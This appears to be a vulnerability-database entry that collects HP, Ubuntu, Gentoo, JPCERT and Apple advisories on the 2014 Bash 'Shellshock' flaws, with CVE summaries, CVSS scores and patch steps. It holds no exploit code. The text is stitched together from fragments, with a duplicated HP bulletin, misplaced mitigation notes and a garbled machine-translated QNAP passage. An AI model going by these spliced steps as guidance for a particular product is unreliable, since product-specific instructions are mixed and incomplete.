VARIoT IoT vulnerabilities database

Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. GNU Bash 3.2 and later are vulnerable; prior versions may also be affected. NOTE: This vulnerability can only be exploited if the attacker already has valid administrative login credentials. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04558068 Version: 1 HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-02-02 Last Updated: 2015-02-02 Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities. References: CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following instructions to resolve these vulnerabilities. Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment: NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. Please update the Bash shell version on the HP Insight Control for Linux Central Management Server also. 1. On the Production RHEL 6.2 OS: a. Prepare temporary directory for Bash update software: # mkdir -p $HOME/tmp/bash # cd $HOME/tmp/bash # pwd <home directory>/tmp/bash b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html to the temporary directory '$HOME/tmp/bash'. c. Extract the Bash update software package. # rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv d. Verify the version of the Bash update software: # ./bin/bash --version GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu) e. Verify version dependencies: # ldd ./bin/bash linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000) f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system: # mkdir $HOME/tmp/lib # cd /lib # cp * $HOME/tmp/lib # cd $HOME/tmp # pwd <home directory>/tmp # tar cvf bash_lib.tar * 2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. 3. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system: a. Create a temporary folder for the toolkit and copy the toolkit there : # mkdir -p $HOME/tmp/temp-toolkit # cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit b. Extract the file 'toolkit.tar.gz' into the temporary folder: # cd $HOME/tmp/temp-toolkit # tar zxvf toolkit.tar.gz # mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp c. Verify the version of the toolkit Bash: # $HOME/tmp/temp-toolkit/bin/bash --version GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. d. Verify dependencies versions: # ldd $HOME/tmp/temp-toolkit/bin/bash linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000) e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations: # tar xvf $HOME/tmp/bash_lib # cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin # cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard # tar czvf toolkit.tar.gz * # cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard HISTORY Version:1 (rev.1) - 2 February 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlTP2EgACgkQ4B86/C0qfVnMkQCg8yH4xRTp9ahC3s4vDiCBmKiV JTwAoPl3SC09DPRWwo1zluDWFF1OfMtA =w7+V -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2364-1 September 27, 2014 bash vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS - Ubuntu 10.04 LTS Summary: Several security issues were fixed in Bash. (CVE-2014-7186, CVE-2014-7187) In addition, this update introduces a hardening measure which adds prefixes and suffixes around environment variable names which contain shell functions. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.4 Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.5 Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.4 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-2364-1 CVE-2014-7186, CVE-2014-7187 Package Information: https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.4 https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.5 https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.4 . HP Product Firmware Version HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701 HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801 The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location: http://www.hp.com/support/eslg3 Notes: - Updating the library firmware requires a reboot of the library. - If the library firmware cannot be updated, HP recommends following the Mitigation Instructions below. - Disable DHCP and only use static IP addressing. No other firmware stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below for the MDS products. HP has released and posted the Cisco switch software version NX-OS 6.2(9a) on HP Support Center (HPSC). This software versions 6.2(9a) has included the fixes for the vulnerability in HP StoreFabric C-series MDS switches which currently supporting NX-OS 6.X releases. HP has released and posted the Cisco switch software version NX-OS 5.2(8e) on HP Support Center (HPSC). This software version 5.2(8e) has included the fix for the vulnerability in HP C-series MDS switches which currently supporting NX-OS 5.X releases. All MDS and Nexus 5K switches can function in this configuration. Access is available through the console port. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201410-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Bash: Multiple vulnerabilities Date: October 04, 2014 Bugs: #523742, #524256 ID: 201410-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple parsing flaws in Bash could allow remote attackers to inject code or cause a Denial of Service condition. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-shells/bash < 4.2_p52 *>= 3.1_p22 *>= 3.2_p56 *>= 4.0_p43 *>= 4.1_p16 >= 4.2_p52 Description =========== Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as "function prefix patch" is included which prevents the exploitation of CVE-2014-6278. Workaround ========== There is no known workaround at this time. Resolution ========== All Bash 3.1 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1" All Bash 3.2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2" All Bash 4.0 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0" All Bash 4.1 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1" All Bash 4.2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52" References ========== [ 1 ] CVE-2014-6277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277 [ 2 ] CVE-2014-6278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278 [ 3 ] CVE-2014-7186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186 [ 4 ] CVE-2014-7187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201410-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . This bulletin will be revised when the update is available. MITIGATION INFORMATION HP recommends the following steps to reduce the risk of this vulnerability: - Place the HP StoreFabric H-series switch and other data center critical infrastructure behind a firewall to disallow access from the Internet. - Change all HP StoreFabric switch default account passwords, including the root passwords, from the default factory passwords. - Examine the list of accounts, including ones on the switch and those existing on remote authentication servers such as RADIUS, LDAP, and TACAS+, to ensure only necessary personnel can gain access to HP StoreFabric H-series switches. Delete guest accounts and temporary accounts created for one-time usage needs. - To avoid possible exploit through the embedded web GUI, QuickTools, disable the web server with the following procedure: NOTE: After completing this procedure, the user will not be able to manage the switch using QuickTools. Login to the Command Line Interface (CLI). Execute the "admin start" command to enter into an admin session. Execute the "set setup services" command and change setting for EmbeddedGUIEnabled to "False". Note: HP and the switch vendor recommend running an active version of Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge (SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around information provided in the MITIGATION INFORMATION section below to protect HP StoreFabric B-series switches from this vulnerability. - Utilize FOS password policy management to strengthen the complexity, age, and history requirements of switch account passwords

GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script. Customers who need to upgrade the firmware of their Superdome X or HP Converged System 900 for SAP HANA should contact HP Technical Support to obtain the firmware or plan to schedule an onsite visit with an HP Services field service professional. NOTE: HP strongly recommends implementing the following security best practices to help reduce both known and future security vulnerability risks: Isolate the HP Superdome X or HP Converged System 900 for SAP HANA's management network by keeping it separate from the data or production network, and not connecting it directly to the Internet without additional access authentication. Patch and maintain Lightweight Directory Access Protocol (LDAP) and web servers. Use virus scanners, intrusion detection/prevention systems (IDS/IPS), and vulnerability scanners regularly. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04558068 Version: 1 HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-02-02 Last Updated: 2015-02-02 Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities. References: CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following instructions to resolve these vulnerabilities. Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment: NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. Please update the Bash shell version on the HP Insight Control for Linux Central Management Server also. 1. On the Production RHEL 6.2 OS: a. Prepare temporary directory for Bash update software: # mkdir -p $HOME/tmp/bash # cd $HOME/tmp/bash # pwd <home directory>/tmp/bash b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html to the temporary directory '$HOME/tmp/bash'. Extract the Bash update software package. # rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv d. Verify the version of the Bash update software: # ./bin/bash --version GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu) e. Verify version dependencies: # ldd ./bin/bash linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000) f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system: # mkdir $HOME/tmp/lib # cd /lib # cp * $HOME/tmp/lib # cd $HOME/tmp # pwd <home directory>/tmp # tar cvf bash_lib.tar * 2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. 3. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system: a. Create a temporary folder for the toolkit and copy the toolkit there : # mkdir -p $HOME/tmp/temp-toolkit # cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit b. Extract the file 'toolkit.tar.gz' into the temporary folder: # cd $HOME/tmp/temp-toolkit # tar zxvf toolkit.tar.gz # mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp c. Verify the version of the toolkit Bash: # $HOME/tmp/temp-toolkit/bin/bash --version GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. Verify dependencies versions: # ldd $HOME/tmp/temp-toolkit/bin/bash linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000) e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations: # tar xvf $HOME/tmp/bash_lib # cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin # cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard # tar czvf toolkit.tar.gz * # cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard HISTORY Version:1 (rev.1) - 2 February 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlTP2EgACgkQ4B86/C0qfVnMkQCg8yH4xRTp9ahC3s4vDiCBmKiV JTwAoPl3SC09DPRWwo1zluDWFF1OfMtA =w7+V -----END PGP SIGNATURE----- . Go to the HP Software Depot site at http://www.software.hp.com and search for HP OneView. HP Product Firmware Version HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701 HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801 The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location: http://www.hp.com/support/eslg3 Notes: - Updating the library firmware requires a reboot of the library. - Disable DHCP and only use static IP addressing. Note: All versions of HP Thin Pro and HP Smart Zero Core operating systems prior to version 5.1.0 are affected by these vulnerabilities. Following is a complete list of affected operating systems and Hardware Platforms Affected. Product Affected Product Versions Patch Status HP ThinPro and HP Smart Zero Core (X86) v5.1.0 and above No update required; the Bash shell patch is incorporated into the base image. Note: If you participated in the ThinPro 5.1.0 beta program then upgrade to the release version as soon as it becomes available. HP ThinPro and HP Smart Zero Core (x86) v5.0.x A component update is currently available through Easy Update as: SecurityUpdate-Shellshock-2.0-all-5.0-x86.xar . The update can be also downloaded directly from HP as part of softpaq sp69382 at the following address: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe HP ThinPro and HP Smart Zero Core (x86) v4.4.x A component update is currently available through Easy Update as: SecurityUpdate-Shellshock-2.0-all-4.4-x86.xar . The update can be also downloaded directly from HP as part of softpaq sp69382 at the following address: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe HP ThinPro and HP Smart Zero Core (ARM) v4.4.x A component update is currently available through Easy Update as: SecurityUpdate-Shellshock-2.0-all-4.4-arm.xar . The update can be also downloaded directly from HP as part of softpaq sp69382 at the following address: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe HP ThinPro and HP Smart Zero Core (X86) v4.1, v4.2, and v4.3 A component update is currently available through Easy Update as: SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-x86.xar . The update can be also downloaded directly from HP as part of softpaq sp69382 at the following address: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe HP ThinPro and HP Smart Zero Core (ARM) v4.1, v4.2, and v4.3 A component update is currently available through Easy Update as: SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-arm.xar . The update can be also downloaded directly from HP as part of softpaq sp69382 at the following address: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe HP ThinPro and HP Smart Zero Core (X86) v3.1, v3.2, and v3.3 Download softpaq sp69382 from: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an update package as: bash_4.1-3+deb6u2_i386.deb . HP ThinPro and HP Smart Zero Core (ARM) v3.1, v3.2, and v3.3 Download softpaq sp69382 from: ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an update package as: bash_4.1-3+deb6u2_armel.deb . No other firmware stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below for the MDS products. This software versions 6.2(9a) has included the fixes for the vulnerability in HP StoreFabric C-series MDS switches which currently supporting NX-OS 6.X releases. This software version 5.2(8e) has included the fix for the vulnerability in HP C-series MDS switches which currently supporting NX-OS 5.X releases. This bulletin will be revised when these updates become available. MITIGATION INFORMATION If updating to a NX-OS version containing the fix is not currently possible, HP recommends the following steps to reduce the risk of this vulnerability: The "ssh" or "telnet" features may be disabled by the admin user. All MDS and Nexus 5K switches can function in this configuration. Access is available through the console port. Background ========== Bash is the standard GNU Bourne Again SHell. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-shells/bash < 4.2_p52 *>= 3.1_p22 *>= 3.2_p56 *>= 4.0_p43 *>= 4.1_p16 >= 4.2_p52 Description =========== Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as "function prefix patch" is included which prevents the exploitation of CVE-2014-6278. Workaround ========== There is no known workaround at this time. Resolution ========== All Bash 3.1 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1" All Bash 3.2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2" All Bash 4.0 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0" All Bash 4.1 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1" All Bash 4.2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52" References ========== [ 1 ] CVE-2014-6277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277 [ 2 ] CVE-2014-6278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278 [ 3 ] CVE-2014-7186 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186 [ 4 ] CVE-2014-7187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201410-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-01-27-4 OS X 10.10.2 and Security Update 2015-001 OS X 10.10.2 and Security Update 2015-001 are now available and address the following: AFP Server Available for: OS X Mavericks v10.9.5 Impact: A remote attacker may be able to determine all the network addresses of the system Description: The AFP file server supported a command which returned all the network addresses of the system. This issue was addressed by removing the addresses from the result. CVE-ID CVE-2014-4426 : Craig Young of Tripwire VERT bash Available for: OS X Yosemite v10.10 and v10.10.1 Impact: Multiple vulnerabilities in bash, including one that may allow local attackers to execute arbitrary code Description: Multiple vulnerabilities existed in bash. These issues were addressed by updating bash to patch level 57. CVE-ID CVE-2014-6277 CVE-2014-7186 CVE-2014-7187 Bluetooth Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An integer signedness error existed in IOBluetoothFamily which allowed manipulation of kernel memory. This issue was addressed through improved bounds checking. This issue does not affect OS X Yosemite systems. CVE-ID CVE-2014-4497 Bluetooth Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An error existed in the Bluetooth driver that allowed a malicious application to control the size of a write to kernel memory. The issue was addressed through additional input validation. CVE-ID CVE-2014-8836 : Ian Beer of Google Project Zero Bluetooth Available for: OS X Yosemite v10.10 and v10.10.1 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple security issues existed in the Bluetooth driver, allowing a malicious application to execute arbitrary code with system privilege. The issues were addressed through additional input validation. CVE-ID CVE-2014-8837 : Roberto Paleari and Aristide Fattori of Emaze Networks CFNetwork Cache Available for: OS X Yosemite v10.10 and v10.10.1 Impact: Website cache may not be fully cleared after leaving private browsing Description: A privacy issue existed where browsing data could remain in the cache after leaving private browsing. This issue was addressed through a change in caching behavior. CVE-ID CVE-2014-4460 CoreGraphics Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 and v10.10.1 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of PDF files. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4481 : Felipe Andres Manzano of the Binamuse VRT, via the iSIGHT Partners GVP Program CPU Software Available for: OS X Yosemite v10.10 and v10.10.1, for: MacBook Pro Retina, MacBook Air (Mid 2013 and later), iMac (Late 2013 and later), Mac Pro (Late 2013) Impact: A malicious Thunderbolt device may be able to affect firmware flashing Description: Thunderbolt devices could modify the host firmware if connected during an EFI update. This issue was addressed by not loading option ROMs during updates. CVE-ID CVE-2014-4498 : Trammell Hudson of Two Sigma Investments CommerceKit Framework Available for: OS X Yosemite v10.10 and v10.10.1 Impact: An attacker with access to a system may be able to recover Apple ID credentials Description: An issue existed in the handling of App Store logs. The App Store process could log Apple ID credentials in the log when additional logging was enabled. This issue was addressed by 